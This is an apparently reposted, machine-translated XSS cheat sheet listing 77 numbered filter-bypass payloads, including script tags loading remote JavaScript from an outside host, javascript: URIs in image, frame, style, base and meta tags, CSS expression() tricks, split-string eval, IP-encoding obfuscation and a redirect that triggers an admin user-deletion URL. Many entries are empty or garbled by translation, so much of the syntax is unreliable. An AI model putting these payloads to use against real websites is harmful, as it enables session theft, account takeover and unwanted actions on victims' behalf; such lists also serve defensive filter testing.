77 anger and 77 XSS Cases

Source: Internet
Author: User

I saw a summary of an XSS from a website. It was actually an image version. What's the use? I am dizzy. I flipped through the original post. The one above T00Ls is also reproduced, the source cannot be found. You are welcome to claim it.
 
(1) Common XSS JavaScript injection
<Script src = http://2cto.com/XSS/xss.js> </SCRIPT>
 
(2) IMG Tag XSS use JavaScript commands
<Script src = http://2cto.com/XSS/xss.js> </SCRIPT>
 
(3) IMG labels without semicolons and without quotation marks

 
(4) the IMG label is case insensitive.

 
(5) HTML encoding (a semicolon is required)

 
(6) modify the defect IMG label
<SCRIPT> alert ("XSS") </SCRIPT> ">
 
(7) formCharCode tag (calculator)

 
(8) Unicode encoding of UTF-8 (calculator)

 
(9) Unicode encoding of 7-bit UTF-8 is not semicolon (calculator)

 
(10) There is no semicolon (calculator) in hexadecimal encoding)

 
(11) embedded tags that separate Javascript

 
(12) embedded encoding labels that separate Javascript

 
(13) embedded line breaks

 
(14) embedded carriage return

 
(15) embedded multi-line JavaScript injection, an extreme XSS example

 
(16) solve the restricted characters (the same page is required)
<Script> z = 'document. '</script>
<Script> z = z + 'write (''</script>
<Script> z = z + '<script' </script>
<Script> z = z + 'src = ht '</script>
<Script> z = z + 'tp: // ww '</script>
<Script> z = z + 'W. shell' </script>
<Script> z = z + '. net/1.' </script>
<Script> z = z + 'js> </SC '</script>
<Script> z = z + 'ript> ") '</script>
<Script> eval_r (z) </script>
 
(17) null characters
Perl-e 'print " out
 
(18) null character 2, null character is basically ineffective in China, because there is no place to use
Perl-e 'print '<SCR \ 0ip> alert (\ "XSS \") </SCR \ 0ept> ";'> out
 
(19) The IMG tag before Spaces and meta

 
(20) Non-alpha-non-digit XSS
<SCRIPT/xss src = "http://2cto.com/XSS/xss.js”> </SCRIPT>
 
(21) Non-alpha-non-digit XSS to 2
<BODY onload! # $ % &()*~ + -_.,:;? @ [/| \] ^ '= Alert ("XSS")>
 
(22) Non-alpha-non-digit XSS to 3
<SCRIPT/SRC = "http://2cto.com/XSS/xss.js”> </SCRIPT>
 
(23) Double parentheses
<SCRIPT> alert ("XSS"); // </SCRIPT>
 
(24) No End Script mark (only Firefox and other browsers)
<Script src = http://2cto.com/XSS/xss.js? <B>
 
(25) No End Script flag 2
<Script src = // 2cto.com/XSS/xss.js>
 
(26) half-open HTML/JavaScript XSS
 
(27) double angle brackets
<Iframe src = http://2cto.com/XSS.html <
 
(28) double quotation marks and semicolons without single quotation marks
<SCRIPT> a =/XSS/
Alert (a. source) </SCRIPT>
 
(29) JavaScript code-Based Filtering
\ "; Alert ('xss ');//
 
(30) End the Title tag
</TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
 
(31) Input Image
<Input src = "javascript: alert ('xss');">
 
(32) BODY Image
<Body background = "javascript: alert ('xss')">
 
(33) BODY Tag
<BODY ('xss')>
 
(34) IMG Dynsrc

 
(35) IMG Lowsrc

 
(36) BGSOUND
<Bgsound src = "javascript: alert ('xss');">
 
(37) STYLE sheet
<Link rel = "stylesheet" HREF = "javascript: alert ('xsss');">
 
(38) Remote Style Sheets
<Link rel = "stylesheet" HREF = "http://2cto.com/xss.css”>
 
(39) List-style-image (style)
<STYLE> li {list-style-image: url ("javascript: alert ('xss')") ;}</STYLE> <UL> <LI> XSS
 
(40) IMG VBscript
</STYLE> <UL> <LI> XSS
 
(41) META url
<META HTTP-EQUIV = "refresh" CONTENT = "0;
URL = http: //; URL = javascript: alert ('xss'); ">
 
(42) Iframe
<Iframe src = "javascript: alert ('xss');"> </IFRAME>
 
(43) Frame
<FRAMESET> <frame src = "javascript: alert ('xsss');"> </FRAMESET>
 
(44) Table
<Table background = "javascript: alert ('xss')">
 
(45) TD
<TABLE> <td background = "javascript: alert ('xsss')">
 
(46) DIV background-image
<Div style = "background-image: url (javascript: alert ('xsss')">
 
(47) add additional characters (1-32 & 34 & 39 & 160 & 8192-) after DIV background-image-
(8 & 13 & 12288 & 65279)
<Div style = "background-image: url (javascript: alert ('xsss')">
 
(48) DIV expression
<Div style = "width: expression_r (alert ('xsss');">
 
(49) expression of STYLE attribute splitting

 
(50) Anonymous STYLE (Composition: opening angle and starting with a letter)
<Xss style = "xss: expression_r (alert ('xsss')">
 
(51) STYLE background-image
<STYLE>. XSS {background-image: url ("javascript: alert ('xsss')") ;}</STYLE> <
CLASS = XSS> </A>
 
(52) IMG STYLE
Exppression (alert ("XSS") '>
 
(53) STYLE background
<STYLE> <STYLE
Type = "text/css"> BODY {background: url ("javascript: alert ('xsss')")} </STYLE>
 
(54) BASE
<Base href = "javascript: alert ('xss'); //">
 
(55) EMBED tag, which can be embedded into FLASH, contains XSS
<Embed src = "http://2cto.com/XSS/xss.swf”> </EMBED>
 
(56) Use ActionScrpt in flash to mix your XSS code
A = "get ";
B = "URL (\"";
C = "javascript :";
D = "alert ('xss ');\")";
Eval_r (a + B + c + d );
 
(57) The XML namespace. HTC file must be on the same server as your XSS carrier.
<HTML xmlns: xss>
<? Import namespace = "xss" implementation = "http://2cto.com/XSS/xss.htc”>
<Xss: xss> XSS </xss: xss>
</HTML>
 
(58) If your JS is filtered out, you can add JS Code to the image to use it.
<Script src = ""> </SCRIPT>
 
(59) IMG embedded command, which can execute any command

 
(601_imginsert command (a.jpg on the same server)
Redirect 302/a.jpg http://www.XXX.com/admin.asp&deleteuser
 
(61) Escape symbol Filtering
<SCRIPT a = ">" SRC = "http://2cto.com/xss.js"> </SCRIPT>
 
(62)
<SCRIPT = ">" SRC = "http://2cto.com/xss.js"> </SCRIPT>
 
(63)
<SCRIPT a = ">" "SRC =" http://2cto.com/xss.js"> </SCRIPT>
 
(64)
<SCRIPT "a = '>'" SRC = "http://2cto.com/xss.js"> </SCRIPT>
 
(65)
<SCRIPT a = '> 'src = "http://2cto.com/xss.js”> </SCRIPT>
 
(66)
<SCRIPT a = "> '>" SRC = "http://2cto.com/xss.js"> </SCRIPT>
 
(67)
<SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http://2cto.com/xss.js”>
</SCRIPT>
 
(68) URL Bypass
<A href = "http: // 127.0.0.1/"> XSS </A>
 
(69) URL Encoding
<A href = "http://2cto.com"> XSS </A>
 
(70) IP decimal
<A href = "http: // 3232235521"> XSS </A>
 
(71) IP hexadecimal
<A href = "http: // 0xc0. 0xa8. 0 × 00. 0 × 01"> XSS </A>
 
(72) IP address gossip
<A href = "http: // 030020.250.0000.0001"> XSS </A>
 
(73) Mixed Encoding
<A href = "h
Tt p: // 6 6.000146.0 × 7. 147/"> XSS </A>
 
(74) Saving [http:]
<A href = "// www.2cto.com/"> XSS </A>
 
(75) Saving [www]
<A href = "http://2cto.com/"> XSS </A>
 
(76) Absolute DNS
<A href = "http://www.bkjia.com./"> XSS </A>
 
(77) javascript Link
<A href = "javascript: document. location = 'HTTP: // www.bkjia.com/'"> XSS </A>

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.